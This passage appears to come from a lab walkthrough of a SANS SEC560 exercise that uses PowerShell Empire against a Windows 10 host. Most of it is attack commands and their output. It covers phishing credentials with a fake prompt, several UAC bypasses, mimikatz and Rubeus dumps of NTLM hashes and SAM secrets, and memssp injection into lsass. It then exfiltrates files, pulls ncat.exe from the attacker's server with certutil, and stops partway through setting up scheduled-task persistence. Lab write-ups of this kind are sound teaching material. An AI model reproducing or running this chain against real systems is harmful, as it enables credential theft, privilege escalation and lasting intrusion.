enter valid creds │ │ │ │ │ (default = false) │ └────────────────┴───────────────────────────────────┴──────────┴─────────────────────────────────────┘
Time to execute ...
(Empire: usemodule/powershell/collection/toasted) > execute [*] Tasked SANS560WINlowpriv to run Task 11
In the first instance, I was a bit too slow to click and thus got the following message
2021-11-20 16:39:07 : tasked agent SANS560WINlowpriv to run module Invoke-CredentialPhisher 2021-11-20 16:40:22 : [-] User did not click on notification
I then ran execute again and this time got.
Looking at the agent.log, we now see the credentials.
2021-11-20 16:44:37 : [+] Phished credentials [Not-verified]: SEC560STUDENT/securitynik@securitynik.local Testing1
At this point, we can use those credentials in other ways. Let's find another way to elevate privileges via UAC bypass as recommended previously.
(Empire: SANS560WINlowpriv) > usemodule powershell/privesc/bypassuac [*] Set Agent to SANS560WINlowpriv (Empire: usemodule/powershell/privesc/bypassuac) > set UserAgent SecurityNik-AUCBypass-User-Agent [*] Set UserAgent to SecurityNik-AUCBypass-User-Agent (Empire: usemodule/powershell/privesc/bypassuac) > set Listener http [*] Set Listener to http
Reviewing the configuration.
(Empire: usemodule/powershell/privesc/bypassuac) > options ┌Record Options────┬──────────────────────────────────┬──────────┬─────────────────────────────────────┐ │ Name │ Value │ Required │ Description │ ├──────────────────┼──────────────────────────────────┼──────────┼─────────────────────────────────────┤ │ Agent │ SANS560WINlowpriv │ True │ Agent to run module on. │ ├──────────────────┼──────────────────────────────────┼──────────┼─────────────────────────────────────┤ │ Bypasses │ mattifestation etw │ False │ Bypasses as a space separated list │ │ │ │ │ to be prepended to the launcher. │ ├──────────────────┼──────────────────────────────────┼──────────┼─────────────────────────────────────┤ │ Listener │ http │ True │ Listener to use. │ ├──────────────────┼──────────────────────────────────┼──────────┼─────────────────────────────────────┤ │ Obfuscate │ False │ False │ Switch. Obfuscate the launcher │ │ │ │ │ powershell code, uses the │ │ │ │ │ ObfuscateCommand for obfuscation │ │ │ │ │ types. For powershell only. │ ├──────────────────┼──────────────────────────────────┼──────────┼─────────────────────────────────────┤ │ ObfuscateCommand │ Token\All\1 │ False │ The Invoke-Obfuscation command to │ │ │ │ │ use. Only used if Obfuscate switch │ │ │ │ │ is True. For powershell only. │ ├──────────────────┼──────────────────────────────────┼──────────┼─────────────────────────────────────┤ │ Proxy │ default │ False │ Proxy to use for request (default, │ │ │ │ │ none, or other). │ ├──────────────────┼──────────────────────────────────┼──────────┼─────────────────────────────────────┤ │ ProxyCreds │ default │ False │ Proxy credentials │ │ │ │ │ ([domain\]username:password) to use │ │ │ │ │ for request (default, none, or │ │ │ │ │ other). │ ├──────────────────┼──────────────────────────────────┼──────────┼─────────────────────────────────────┤ │ UserAgent │ SecurityNik-AUCBypass-User-Agent │ False │ User-agent string to use for the │ │ │ │ │ staging request (default, none, or │ │ │ │ │ other). │ └──────────────────┴──────────────────────────────────┴──────────┴─────────────────────────────────────┘
Executing the command
(Empire: usemodule/powershell/privesc/bypassuac) > execute [*] Tasked SANS560WINlowpriv to run Task 13
Once this was run successfully, a new agent got registered.
[+] New agent 8XW5324B checked in [*] Sending agent (stage 2) to 8XW5324B at 10.0.0.110
Looking at the agents again, we see.
(Empire: usemodule/powershell/privesc/bypassuac) > agents ┌Agents──────────────────┬────────────┬─────────────┬──────────────────────┬────────────┬──────┬────────┬─────────────────────────┬──────────┐ │ ID │ Name │ Language │ Internal IP │ Username │ Process │ PID │ Delay │ Last Seen │ Listener │ ├────┼───────────────────┼────────────┼─────────────┼──────────────────────┼────────────┼──────┼────────┼─────────────────────────┼──────────┤ │ 1 │ SANS560WINlowpriv │ powershell │ 10.0.0.110 │ SEC560STUDENT\sec560 │ powershell │ 3600 │ 60/0.0 │ 2021-11-20 17:05:45 EST │ http │ │ │ │ │ │ │ │ │ │ (38 seconds ago) │ │ ├────┼───────────────────┼────────────┼─────────────┼──────────────────────┼────────────┼──────┼────────┼─────────────────────────┼──────────┤ │ 2 │ 8XW5324B* │ powershell │ 10.0.0.110 │ SEC560STUDENT\sec560 │ powershell │ 4356 │ 60/0.0 │ 2021-11-20 17:05:58 EST │ http │ │ │ │ │ │ │ │ │ │ (25 seconds ago) │ │ └────┴───────────────────┴────────────┴─────────────┴──────────────────────┴────────────┴──────┴────────┴─────────────────────────┴──────────┘
Notice the agent with ID 2, has an asterisk (*) next to it, this means it is high privilege. Let's rename this agent and run the agents command again.
(Empire: agents) > rename 8XW5324B SANS560HighPrivBypassUAC (Empire: agents) > agents ┌Agents──────────────────────────┬────────────┬─────────────┬──────────────────────┬────────────┬──────┬────────┬─────────────────────────┬──────────┐ │ ID │ Name │ Language │ Internal IP │ Username │ Process │ PID │ Delay │ Last Seen │ Listener │ ├────┼───────────────────────────┼────────────┼─────────────┼──────────────────────┼────────────┼──────┼────────┼─────────────────────────┼──────────┤ │ 1 │ SANS560WINlowpriv │ powershell │ 10.0.0.110 │ SEC560STUDENT\sec560 │ powershell │ 3600 │ 60/0.0 │ 2021-11-20 17:07:45 EST │ http │ │ │ │ │ │ │ │ │ │ (22 seconds ago) │ │ ├────┼───────────────────────────┼────────────┼─────────────┼──────────────────────┼────────────┼──────┼────────┼─────────────────────────┼──────────┤ │ 2 │ SANS560HighPrivBypassUAC* │ powershell │ 10.0.0.110 │ SEC560STUDENT\sec560 │ powershell │ 4356 │ 60/0.0 │ 2021-11-20 17:07:58 EST │ http │ │ │ │ │ │ │ │ │ │ (9 seconds ago) │ │ └────┴───────────────────────────┴────────────┴─────────────┴──────────────────────┴────────────┴──────┴────────┴─────────────────────────┴──────────┘
Trying to elevate privileges with the ask option.
(Empire: agents) > interact SANS560WINlowpriv [*] Task 13 results received Job started: G1SLA9 (Empire: SANS560WINlowpriv) > usemodule powershell/privesc/ask [*] Set Agent to SANS560WINlowpriv (Empire: usemodule/powershell/privesc/ask) > set UserAgent SecurityNik-UAC-ASK [*] Set UserAgent to SecurityNik-UAC-ASK (Empire: usemodule/powershell/privesc/ask) > set Listener http [*] Set Listener to http (Empire: usemodule/powershell/privesc/ask) > options ┌Record Options────┬─────────────────────┬──────────┬─────────────────────────────────────┐ │ Name │ Value │ Required │ Description │ ├──────────────────┼─────────────────────┼──────────┼─────────────────────────────────────┤ │ Agent │ SANS560WINlowpriv │ True │ Agent to run module on. │ ├──────────────────┼─────────────────────┼──────────┼─────────────────────────────────────┤ │ Bypasses │ mattifestation etw │ False │ Bypasses as a space separated list │ │ │ │ │ to be prepended to the launcher. │ ├──────────────────┼─────────────────────┼──────────┼─────────────────────────────────────┤ │ Listener │ http │ True │ Listener to use. │ ├──────────────────┼─────────────────────┼──────────┼─────────────────────────────────────┤ │ Obfuscate │ False │ False │ Switch. Obfuscate the launcher │ │ │ │ │ powershell code, uses the │ │ │ │ │ ObfuscateCommand for obfuscation │ │ │ │ │ types. For powershell only. │ ├──────────────────┼─────────────────────┼──────────┼─────────────────────────────────────┤ │ ObfuscateCommand │ Token\All\1 │ False │ The Invoke-Obfuscation command to │ │ │ │ │ use. Only used if Obfuscate switch │ │ │ │ │ is True. For powershell only. │ ├──────────────────┼─────────────────────┼──────────┼─────────────────────────────────────┤ │ Proxy │ default │ False │ Proxy to use for request (default, │ │ │ │ │ none, or other). │ ├──────────────────┼─────────────────────┼──────────┼─────────────────────────────────────┤ │ ProxyCreds │ default │ False │ Proxy credentials │ │ │ │ │ ([domain\]username:password) to use │ │ │ │ │ for request (default, none, or │ │ │ │ │ other). │ ├──────────────────┼─────────────────────┼──────────┼─────────────────────────────────────┤ │ UserAgent │ SecurityNik-UAC-ASK │ False │ User-agent string to use for the │ │ │ │ │ staging request (default, none, or │ │ │ │ │ other). │ └──────────────────┴─────────────────────┴──────────┴─────────────────────────────────────
Executing the code
(Empire: usemodule/powershell/privesc/ask) > execute [*] Tasked SANS560WINlowpriv to run Task 14
Once again a new agent got registered.
[+] New agent L318PM2Z checked in [*] Sending agent (stage 2) to L318PM2Z at 10.0.0.110
Giving it a meaningful name
(Empire: usemodule/powershell/privesc/ask) > agents (Empire: agents) > rename L318PM2Z SANS560UACAskHighPriv (Empire: agents) > interact SANS560WINlowpriv [*] Task 14 results received [*] Successfully elevated!
Trying one more privilege escalation technique.
(Empire: SANS560WINlowpriv) > usemodule powershell/privesc/bypassuac_eventvwr [*] Set Agent to SANS560WINlowpriv (Empire: usemodule/powershell/privesc/bypassuac_eventvwr) > set UserAgent SecurityNik-EventVwr-UAC-Bypass [*] Set UserAgent to SecurityNik-EventVwr-UAC-Bypass (Empire: usemodule/powershell/privesc/bypassuac_eventvwr) > set Listener http [*] Set Listener to http (Empire: usemodule/powershell/privesc/bypassuac_eventvwr) > options ┌Record Options────┬─────────────────────────────────┬──────────┬─────────────────────────────────────┐ │ Name │ Value │ Required │ Description │ ├──────────────────┼─────────────────────────────────┼──────────┼─────────────────────────────────────┤ │ Agent │ SANS560WINlowpriv │ True │ Agent to run module on. │ ├──────────────────┼─────────────────────────────────┼──────────┼─────────────────────────────────────┤ │ Bypasses │ mattifestation etw │ False │ Bypasses as a space separated list │ │ │ │ │ to be prepended to the launcher. │ ├──────────────────┼─────────────────────────────────┼──────────┼─────────────────────────────────────┤ │ Listener │ http │ True │ Listener to use. │ ├──────────────────┼─────────────────────────────────┼──────────┼─────────────────────────────────────┤ │ Obfuscate │ False │ False │ Switch. Obfuscate the launcher │ │ │ │ │ powershell code, uses the │ │ │ │ │ ObfuscateCommand for obfuscation │ │ │ │ │ types. For powershell only. │ ├──────────────────┼─────────────────────────────────┼──────────┼─────────────────────────────────────┤ │ ObfuscateCommand │ Token\All\1 │ False │ The Invoke-Obfuscation command to │ │ │ │ │ use. Only used if Obfuscate switch │ │ │ │ │ is True. For powershell only. │ ├──────────────────┼─────────────────────────────────┼──────────┼─────────────────────────────────────┤ │ Proxy │ default │ False │ Proxy to use for request (default, │ │ │ │ │ none, or other). │ ├──────────────────┼─────────────────────────────────┼──────────┼─────────────────────────────────────┤ │ ProxyCreds │ default │ False │ Proxy credentials │ │ │ │ │ ([domain\]username:password) to use │ │ │ │ │ for request (default, none, or │ │ │ │ │ other). │ ├──────────────────┼─────────────────────────────────┼──────────┼─────────────────────────────────────┤ │ UserAgent │ SecurityNik-EventVwr-UAC-Bypass │ False │ User-agent string to use for the │ │ │ │ │ staging request (default, none, or │ │ │ │ │ other). │ └──────────────────┴─────────────────────────────────┴──────────┴─────────────────────────────────────┘ [*] Tasked SANS560WINlowpriv to run Task 15 (Empire: usemodule/powershell/privesc/bypassuac_eventvwr) >
While I saw entries in the log file and Event Viewer opening up, this did not give me elevated privileges.
I then tried the WScript. This reported the host was not vulnerable.
(Empire: SANS560WINlowpriv) > usemodule powershell/privesc/bypassuac_wscript [*] Set Agent to SANS560WINlowpriv 2021-11-20 18:45:08 : [!] WARNING: Target Not Vulnerable
Now that we have at least 2 privilege agents, let's get some more credentials.
5. Gaining (more) credentials
With privileges elevated, time to pillage credentials.
Previously when the attempt was made to execute mimikatz, it failed. Trying it once again.
(Empire: SANS560WINlowpriv) > mimikatz [!] Error: module needs to run in an elevated context
Ooops!!! Looks like we need to switch one of the elevated agents. Interacting with a high privilege agent.
(Empire: agents) > interact SANS560HighPrivBypassUAC (Empire: SANS560HighPrivBypassUAC) >
Running mimikatz once again.
(Empire: SANS560HighPrivBypassUAC) > mimikatz [*] Tasked SANS560HighPrivBypassUAC to run Task 1
Now that is progress.
Even more progress. Looking at the agent log.
2021-11-20 18:49:54 : tasked agent 8XW5324B to run module Invoke-Mimikatz DumpCreds 2021-11-20 18:50:37 : Job started: B61KRZ 2021-11-20 18:51:38 : Hostname: Sec560Student / S-1-5-21-2977773840-2930198165-1551093962 .#####. mimikatz 2.2.0 (x64) #19041 Jun 9 2021 18:55:28 .## ^ ##. "A La Vie, A L'Amour" - (oe.eo) ## / \ ## /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com ) ## \ / ## > https://blog.gentilkiwi.com/mimikatz '## v ##' Vincent LE TOUX ( vincent.letoux@gmail.com ) '#####' > https://pingcastle.com / https://mysmartlogon.com ***/ mimikatz(powershell) # sekurlsa::logonpasswords Authentication Id : 0 ; 3548381 (00000000:003624dd) Session : Service from 0 User Name : DefaultAppPool Domain : IIS APPPOOL Logon Server : (null) Logon Time : 11/20/2021 5:55:46 PM SID : S-1-5-82-3006700770-424185619-1745488364-794895919-4004696415 msv : tspkg : wdigest : * Username : SEC560STUDENT$ * Domain : SEC560 * Password : (null) kerberos : ssp : credman : cloudap : Authentication Id : 0 ; 458925 (00000000:000700ad) Session : Interactive from 1 User Name : sec560 Domain : SEC560STUDENT Logon Server : SEC560STUDENT Logon Time : 11/20/2021 4:54:39 PM SID : S-1-5-21-2977773840-2930198165-1551093962-1202 msv : [00000003] Primary * Username : sec560 * Domain : SEC560STUDENT * NTLM : 7abdbb1631d1674637aa354c4b4dd273 * SHA1 : 29282a5203a2e5444ef3053f6ba4943bbb0e3fc4 tspkg : wdigest : * Username : sec560 * Domain : SEC560STUDENT * Password : (null) kerberos : * Username : sec560 * Domain : SEC560STUDENT * Password : (null) ssp : credman : cloudap : ... mimikatz(powershell) # exit Bye!
Looking at credentials seen by Powershell-Empire.
(Empire: SANS560HighPrivBypassUAC) > credentials ┌Credentials────┬───────────────┬──────────┬───────────────┬──────────────────────────────────┬─────┬─────────────────────────────────┬─────────────────────┐ │ ID │ CredType │ Domain │ UserName │ Host │ Password/Hash │ SID │ OS │ Notes │ ├────┼──────────┼───────────────┼──────────┼───────────────┼──────────────────────────────────┼─────┼─────────────────────────────────┼─────────────────────┤ │ 1 │ hash │ SEC560STUDENT │ sec560 │ Sec560Student │ 7abdbb1631d1674637aa354c4b4dd273 │ │ Microsoft Windows 10 Enterprise │ 2021-11-20 18:51:38 │ └────┴──────────┴───────────────┴──────────┴───────────────┴──────────────────────────────────┴─────┴─────────────────────────────────┴─────────────────────┘
Injecting the memssp module into lsass.exe. This allows the credentials for any user to be written to the C:\Windows\System32\mimisla.log log file on the host.
(Empire: SANS560HighPrivBypassUAC) > usemodule powershell/persistence/misc/memssp [*] Set Agent to SANS560HighPrivBypassUAC (Empire: usemodule/powershell/persistence/misc/memssp) > execute [*] Tasked SANS560HighPrivBypassUAC to run Task 2
Looking at the agent.log.
2021-11-20 19:06:32 : tasked agent SANS560HighPrivBypassUAC to run module Invoke-Mimikatz memssp 2021-11-20 19:07:47 : Job started: 7YP5T4 2021-11-20 19:08:47 : Hostname: Sec560Student / S-1-5-21-2977773840-2930198165-1551093962 .#####. mimikatz 2.2.0 (x64) #19041 Jun 9 2021 18:55:28 .## ^ ##. "A La Vie, A L'Amour" - (oe.eo) ## / \ ## /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com ) ## \ / ## > https://blog.gentilkiwi.com/mimikatz '## v ##' Vincent LE TOUX ( vincent.letoux@gmail.com ) '#####' > https://pingcastle.com / https://mysmartlogon.com ***/ mimikatz(powershell) # misc::memssp Injected =) memssp installed, check C:\Windows\System32\mimisla.log for logon events.
Connecting to the shell on the host to view the mimilisa.log file.
(Empire: SANS560HighPrivBypassUAC) > shell [*] Exit Shell Menu with Ctrl+C (SANS560HighPrivBypassUAC) C:\WINDOWS\system32 > cmd.exe /c "type c:\windows\system32\mimisla.log" (SANS560HighPrivBypassUAC) C:\WINDOWS\system32 >
Looking at the agent.log file.
2021-11-20 19:13:16 : tasked agent 8XW5324B to run command cmd.exe /c "type c:\windows\system32\mimisla.log" 2021-11-20 19:13:49 : 2021-11-20 19:17:44 : tasked agent 8XW5324B to run command cmd.exe /c "type c:\windows\system32\mimilsa.log" 2021-11-20 19:17:50 : [00000000:00d9afac] SEC560STUDENT\sec560 sec560 [00000000:00d9afd7] SEC560STUDENT\sec560 sec560 [00000000:010ced5a] SEC560STUDENT\sec560 sec560 [00000000:010ceec4] SEC560STUDENT\sec560 sec560
Grabbing the Security Accounts Manager (SAM) Database.
(Empire: SANS560HighPrivBypassUAC) > usemodule powershell/credentials/mimikatz/sam [*] Set Agent to SANS560HighPrivBypassUAC ┌Record Options────────────────────┬──────────┬─────────────────────────┐ │ Name │ Value │ Required │ Description │ ├───────┼──────────────────────────┼──────────┼─────────────────────────┤ │ Agent │ SANS560HighPrivBypassUAC │ True │ Agent to run module on. │ └───────┴──────────────────────────┴──────────┴─────────────────────────┘ (Empire: usemodule/powershell/credentials/mimikatz/sam) > execute [*] Tasked SANS560HighPrivBypassUAC to run Task 6
As always, reviewing the agent.log.
2021-11-20 19:22:27 : tasked agent SANS560HighPrivBypassUAC to run module Invoke-Mimikatz SAM dump 2021-11-20 19:23:04 : Job started: VTZ9NY 2021-11-20 19:24:05 : Hostname: Sec560Student / S-1-5-21-2977773840-2930198165-1551093962 .#####. mimikatz 2.2.0 (x64) #19041 Jun 9 2021 18:55:28 .## ^ ##. "A La Vie, A L'Amour" - (oe.eo) ## / \ ## /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com ) ## \ / ## > https://blog.gentilkiwi.com/mimikatz '## v ##' Vincent LE TOUX ( vincent.letoux@gmail.com ) '#####' > https://pingcastle.com / https://mysmartlogon.com ***/ mimikatz(powershell) # token::elevate Token Id : 0 User name : SID name : NT AUTHORITY\SYSTEM 584 {0;000003e7} 1 D 42955 NT AUTHORITY\SYSTEM S-1-5-18 (04g,21p) Primary -> Impersonated ! * Process Token : {0;0007007d} 1 F 8903583 SEC560STUDENT\sec560 S-1-5-21-2977773840-2930198165-1551093962-1202 (14g,24p) Primary * Thread Token : {0;000003e7} 1 D 17857121 NT AUTHORITY\SYSTEM S-1-5-18 (04g,21p) Impersonation (Delegation) mimikatz(powershell) # lsadump::sam Domain : SEC560STUDENT SysKey : e2a5379f049ff5f37e322618f569e020 Local SID : S-1-5-21-2977773840-2930198165-1551093962 SAMKey : e40f50ec79bc899e9e73681cc1f1ef10 RID : 000001f4 (500) User : Administrator RID : 000001f5 (501) User : Guest RID : 000001f7 (503) User : DefaultAccount RID : 000001f8 (504) User : WDAGUtilityAccount Hash NTLM: 9679f78eec859fdedb8c208c8fcf4abf Supplemental Credentials: * Primary:NTLM-Strong-NTOWF * Random Value : 118e9239b1e3131c604aed931a6483ce * Primary:Kerberos-Newer-Keys * Default Salt : SEC504STUDENTWDAGUtilityAccount Default Iterations : 4096 Credentials aes256_hmac (4096) : 4ad74d67e523c7f6715edb2d899c236f6d1e315470fe74249262b923ab006874 aes128_hmac (4096) : a2f2ec30564c95960931d0480acb9220 des_cbc_md5 (4096) : 46a82389e0649e1c ... * Primary:Kerberos-Newer-Keys * Default Salt : SEC560STUDENTnotadmin Default Iterations : 4096 Credentials aes256_hmac (4096) : 7b462c5e57de3a5fae465b5288b3cafd4550b99e179cf5c31f51cac45d42c0e3 aes128_hmac (4096) : 08926d92cb36e12aeabdf81cdc238131 des_cbc_md5 (4096) : fd1a079dd0b94cbc ... mimikatz(powershell) # token::revert * Process Token : {0;0007007d} 1 F 8903583 SEC560STUDENT\sec560 S-1-5-21-2977773840-2930198165-1551093962-1202 (14g,24p) Primary * Thread Token : no token
Grabbing credentials with Rubeus
2021-11-20 19:30:53 : tasked agent SANS560HighPrivBypassUAC to run module Invoke-Rubeus 2021-11-20 19:31:07 : Administrator:500:24d666dff420a669de4afb2f96b214dd:372c5f8eb6a2e4b07caa7a4d5d7bcf30::: Guest:501:edb8bd2a41d54ed296c4a6ca3e9ec80f:882b4fb7507002487e96831d1297822f::: DefaultAccount:503:e455c45a5adc07078973696d3f86c447:2545ae7899dec24956cc2a248e974601::: WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:9679f78eec859fdedb8c208c8fcf4abf::: sec560:1202:aad3b435b51404eeaad3b435b51404ee:7abdbb1631d1674637aa354c4b4dd273::: notadmin:1203:aad3b435b51404eeaad3b435b51404ee:c62638b38308e651b21a0f2ccab3ac9b::: clark:1210:aad3b435b51404eeaad3b435b51404ee:594bb6d6d86a285ea1c8b04fd1f306e9::: john:1211:aad3b435b51404eeaad3b435b51404ee:2b576acbe6bcfda7294d6bd18041b8fe:::
Now that we have credentials, time to move on.
6. Capturing packets
Time to capture some packets, so that we can analyze later to see what is going on on this host.
(Empire: SANS560HighPrivBypassUAC) > usemodule powershell/collection/packet_capture [*] Set Agent to SANS560HighPrivBypassUAC (Empire: usemodule/powershell/collection/packet_capture) > set MaxSize 1MB [*] Set MaxSize to 1MB (Empire: usemodule/powershell/collection/packet_capture) > set TraceFile c:\\tmp\\capture.etl [*] Set TraceFile to c:\tmp\capture.etl (Empire: usemodule/powershell/collection/packet_capture) > options ┌Record Options─────────────────────────┬──────────┬─────────────────────────────────────┐ │ Name │ Value │ Required │ Description │ ├────────────┼──────────────────────────┼──────────┼─────────────────────────────────────┤ │ Agent │ SANS560HighPrivBypassUAC │ True │ Agent to run module on. │ ├────────────┼──────────────────────────┼──────────┼─────────────────────────────────────┤ │ MaxSize │ 1MB │ True │ Maximum size of capture file. Blank │ │ │ │ │ for no limit. │ ├────────────┼──────────────────────────┼──────────┼─────────────────────────────────────┤ │ Persistent │ │ False │ Switch. Persist capture across │ │ │ │ │ reboots. │ ├────────────┼──────────────────────────┼──────────┼─────────────────────────────────────┤ │ StopTrace │ │ False │ Switch. Stop trace capture. │ ├────────────┼──────────────────────────┼──────────┼─────────────────────────────────────┤ │ TraceFile │ c:\tmp\capture.etl │ True │ File to log the capture out to. │ └────────────┴──────────────────────────┴──────────┴─────────────────────────────────────┘ (Empire: usemodule/powershell/collection/packet_capture) > execute [*] Tasked SANS560HighPrivBypassUAC to run Task 9
Looking at the agent.log.
2021-11-20 19:45:10 : tasked agent SANS560HighPrivBypassUAC to run module Invoke-PacketCapture 2021-11-20 19:45:16 : Trace configuration: ------------------------------------------------------------------- Status: Running Trace File: C:\tmp\capture.etl Append: Off Circular: On Max Size: 1 MB Report: Off
Stopping the trace.
(Empire: usemodule/powershell/collection/packet_capture) > set StopTrace True [*] Set StopTrace to True (Empire: usemodule/powershell/collection/packet_capture) > execute [*] Tasked SANS560HighPrivBypassUAC to run Task 17
Looking at the agent.log.
2021-11-20 21:06:05 : Merging traces ... done Generating data collection ... done The trace file and additional troubleshooting information have been compiled as "c:\tmp\capture.cab". File location = c:\tmp\capture.etl Tracing session was successfully stopped.
7. Downloading contents - Exfiltration
Using the download option
(Empire: usemodule/powershell/collection/packet_capture) > interact SANS560HighPrivBypassUAC [*] Task 12 results received (Empire: SANS560HighPrivBypassUAC) >
Downloading all contents within the c:\tmp\ directory
(Empire: SANS560HighPrivBypassUAC) > download c:\\tmp\\*.* [*] Tasked SANS560HighPrivBypassUAC to run Task 18
Powershell-empire server console shows
[+] Part of file build1.xml from 8XW5324B saved [100.0%] to /var/lib/powershell-empire//downloads/8XW5324B/C:/tmp [+] Part of file build2.xml from 8XW5324B saved [100.0%] to /var/lib/powershell-empire//downloads/8XW5324B/C:/tmp [+] Part of file capture.cab from 8XW5324B saved [100.0%] to /var/lib/powershell-empire//downloads/8XW5324B/C:/tmp [+] Part of file capture.etl from 8XW5324B saved [100.0%] to /var/lib/powershell-empire//downloads/8XW5324B/C:/tmp [+] Part of file launcher.xml from 8XW5324B saved [100.0%] to /var/lib/powershell-empire//downloads/8XW5324B/C:/tmp [+] Part of file MSBuild.exe from 8XW5324B saved [100.0%] to /var/lib/powershell-empire//downloads/8XW5324B/C:/tmp [+] Part of file test.txt from 8XW5324B saved [100.0%] to /var/lib/powershell-empire//downloads/8XW5324B/C:/tmp
Looking at the agent.log ...
2021-11-20 21:12:02 : Tasked agent to download c:\tmp\*.* 2021-11-20 21:12:06 : file download: C:\tmp\build1.xml, part: 0 2021-11-20 21:13:07 : file download: C:\tmp\build2.xml, part: 0 2021-11-20 21:14:08 : file download: C:\tmp\capture.cab, part: 0 2021-11-20 21:15:12 : file download: C:\tmp\capture.etl, part: 0 2021-11-20 21:16:12 : file download: C:\tmp\launcher.xml, part: 0 2021-11-20 21:17:13 : file download: C:\tmp\MSBuild.exe, part: 0 2021-11-20 21:18:13 : file download: C:\tmp\test.txt, part: 0 2021-11-20 21:19:13 : [*] File download of C:\tmp\build1.xml completed 2021-11-20 21:19:14 : [*] File download of C:\tmp\build2.xml completed 2021-11-20 21:19:14 : [*] File download of C:\tmp\capture.cab completed 2021-11-20 21:19:14 : [*] File download of C:\tmp\capture.etl completed 2021-11-20 21:19:14 : [*] File download of C:\tmp\launcher.xml completed 2021-11-20 21:19:14 : [*] File download of C:\tmp\MSBuild.exe completed 2021-11-20 21:19:14 : [*] File download of C:\tmp\test.txt completed
Confirming the files were successfully downloaded and are now stored on our attacking machine.
┌──(rootđź’€securitynik)-[/home/securitynik/packets] └─# ls /var/lib/powershell-empire/downloads/8XW5324B/C\:/tmp/ -l total 1720 -rw-r--r-- 1 root root 833 Nov 20 21:12 build1.xml -rw-r--r-- 1 root root 3951 Nov 20 21:13 build2.xml -rw-r--r-- 1 root root 432248 Nov 20 21:14 capture.cab -rw-r--r-- 1 root root 1048576 Nov 20 21:15 capture.etl -rw-r--r-- 1 root root 3941 Nov 20 21:16 launcher.xml -rw-r--r-- 1 root root 261688 Nov 20 21:17 MSBuild.exe -rw-r--r-- 1 root root 17 Nov 20 21:18 test.txt
There we go, with a successful exfiltration.
8. Uploading contents to the host.
I was having some problems with the upload module. Not sure what I was doing wrong.
Looking at the help, this is what it shows.
(Empire: 8XW5324B) > upload --help Tasks an the specified agent to upload a file. Usage: upload <local_file_directory> [destination_file_name]
However, none of my activities generated a new task. For example, I tried the following 2 strategies:
(Empire: 73H864SX) > upload /home/securitynik/WinTools/ncat.exe c:\\tmp\\ncat.exe (Empire: 73H864SX) > upload /home/securitynik/WinTools/ncat.exe
None of the upload I did generated a task. So I tried another method to get the file unto the file system. I guess whatever works is all that matters.
Hosted my file using Python SimpleHTTPServer:
┌──(rootđź’€securitynik)-[/home/securitynik/WinTools] └─# python -m SimpleHTTPServer 80 Serving HTTP on 0.0.0.0 port 80 ...
Dropping to the shell and executing Certutil.
(Empire: 73H864SX) > shell [*] Exit Shell Menu with Ctrl+C (73H864SX) > cmd.exe /c "certutil -URLCache -F http://10.0.0.107:80/ncat.exe ncat.exe"
Looking at the Python HTTP Server I see the file has been successfully download.
┌──(rootđź’€securitynik)-[/home/securitynik/WinTools] └─# python -m SimpleHTTPServer 80 Serving HTTP on 0.0.0.0 port 80 ... 10.0.0.110 - - [21/Nov/2021 18:51:04] "GET /ncat.exe HTTP/1.1" 200 - 10.0.0.110 - - [21/Nov/2021 18:51:04] "GET /ncat.exe HTTP/1.1" 200 -
Reviewing the agent.log, I see.
2021-11-21 18:50:29 : tasked agent 73H864SX to run command certutil -URLCache -F http://10.0.0.107:80/ncat.exe c:\tmp\ncat.exe 2021-11-21 18:51:04 : **** Online **** CertUtil: -URLCache command completed successfully.
Running dir on the host to confirm the file was successfully downloaded.
(73H864SX) > dir c:\tmp\ncat.exe Mode Owner LastWriteTime Length Name ---- ----- ------------- ------ ---- -a---- NT AUTHORITY\SYSTEM 11/21/2021 10:38:27 PM 1667584 ncat.exe
While I was unable to get the upload feature of Powershell Empire to work, I was still able to achieve my objective.
9. Persistence
For persistence, I like schedule tasks, as it allows you to have predictability, in controlling how and when your malicious code can execute
(Empire: SANS560HighPrivBypassUAC) > usemodule powershell/persistence/elevated/schtasks [*] Set Agent to SANS560HighPrivBypassUAC (Empire: usemodule/powershell/persistence/elevated/schtasks) > set OnLogon True [*] Set OnLogon to True (Empire: usemodule/powershell/persistence/elevated/schtasks) > set UserAgent Securitynik-Persistence-Schtasks-UserAgent [*] Set UserAgent to Securitynik-Persistence-Schtasks-UserAgent (Empire: usemodule/powershell/persistence/elevated/schtasks) > options ┌Record Options────┬─────────────────────────────────────┬──────────┬─────────────────────────────────────┐ │ Name │ Value │ Required │ Description │ ├──────────────────┼─────────────────────────────────────┼──────────┼─────────────────────────────────────┤ │ ADSPath │ │ False │ Alternate-data-stream location to │ │ │ │ │ store the script code. │ ├──────────────────┼─────────────────────────────────────┼──────────┼─────────────────────────────────────┤ │ Agent │ SANS560HighPrivBypassUAC │ True │ Agent to run module on. │ ├──────────────────┼─────────────────────────────────────┼──────────┼─────────────────────────────────────┤ │ Bypasses │ mattifestation etw │ False │ Bypasses as a space separated list │ │ │ │ │ to be prepended to the launcher. │ ├──────────────────┼─────────────────────────────────────┼──────────┼─────────────────────────────────────┤ │ Cleanup │ │ False │ Switch. Cleanup the trigger and any │ │ │ │ │ script from specified location. │ ├──────────────────┼─────────────────────────────────────┼──────────┼─────────────────────────────────────┤ │ DailyTime │ 09:00 │ False │ Daily time to trigger the script │ │ │ │ │ (HH:mm). │ ├──────────────────┼─────────────────────────────────────┼──────────┼─────────────────────────────────────┤ │ ExtFile │ │ False │ Use an external file for the │ │ │ │ │ payload instead of a stager. │ ├──────────────────┼─────────────────────────────────────┼──────────┼─────────────────────────────────────┤ │ IdleTime │ │ False │ User idle time (in minutes) to │ │ │ │ │ trigger script. │ ├──────────────────┼─────────────────────────────────────┼──────────┼─────────────────────────────────────┤ │ Listener │ http │ False │ Listener to use. │ ├──────────────────┼─────────────────────────────────────┼──────────┼─────────────────────────────────────┤ │ Obfuscate │ False │ False │ Switch. Obfuscate the launcher │ │ │ │ │ powershell code, uses the │ │ │ │ │ ObfuscateCommand for obfuscation │ │ │ │ │ types. For powershell only. │ ├──────────────────┼─────────────────────────────────────┼──────────┼─────────────────────────────────────┤ │ ObfuscateCommand │ Token\All\1 │ False │ The Invoke-Obfuscation command to │ │ │ │ │ use. Only used if Obfuscate switch │ │ │ │ │ is True. For powershell only. │ ├──────────────────┼─────────────────────────────────────┼──────────┼─────────────────────────────────────┤ │ OnLogon │ True │ False │ Switch. Trigger script on user │ │ │ │ │ logon. │ ├──────────────────┼─────────────────────────────────────┼──────────┼─────────────────────────────────────┤ │ Proxy │ 